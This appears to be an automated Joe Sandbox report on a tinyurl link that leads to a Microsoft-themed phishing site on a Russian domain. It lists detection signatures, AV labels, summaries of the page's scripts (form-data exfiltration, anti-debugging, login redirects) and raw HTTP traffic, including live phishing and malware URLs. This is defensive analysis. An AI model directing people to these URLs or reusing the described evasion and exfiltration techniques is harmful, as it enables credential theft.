Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://tinyurl.com/Amconconstruction

Overview

General Information

Sample URL:https://tinyurl.com/Amconconstruction
Analysis ID:1592026
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,6220749395400112799,8409351740452075553,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 2676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tinyurl.com/Amconconstruction" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://mstn.qomitarnor.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru/pFGLdePtgRbnQGWUVTchrlHEeVXVUPMZSHGJUQTEJVUQOSFRKRHTNPNQXLMUEVNZOGJKBVWSRPCMQZSYWKAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mstn.qomitarnor.ru/JY1H/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious login page. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of credential theft or other nefarious activities.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mstn.qomitarnor.ru/JY1H/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `fetch` API to send form data to an untrusted domain, and it also attempts to redirect the user to a Microsoft login page, which is likely part of a phishing attempt. The overall behavior of this script is highly suspicious and indicative of malicious intent.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://mstn.qomitarnor.ru/JY1H/... The provided JavaScript snippet exhibits several high-risk and moderate-risk behaviors, indicating a potentially malicious intent. It includes dynamic code execution, data exfiltration, and obfuscated code/URLs, which are considered high-risk indicators. Additionally, it demonstrates aggressive DOM manipulation and the use of fallback domains, which are moderate-risk indicators. While the script may have some legitimate functionality, the overall behavior and lack of transparency raise significant security concerns, warranting a high-risk score.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 150382b0-dff4-464e-846e-6bca1df27a0675770042-a548-4cbb-a241-c8a9fdc14c2e
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://mstn.qomitarnor.ru/JY1H/HTTP Parser: No favicon
Source: https://mstn.qomitarnor.ru/JY1H/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.131
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.138
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Amconconstruction HTTP/1.1Host: tinyurl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /JY1H/ HTTP/1.1Host: mstn.qomitarnor.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mstn.qomitarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mstn.qomitarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mstn.qomitarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mstn.qomitarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mstn.qomitarnor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
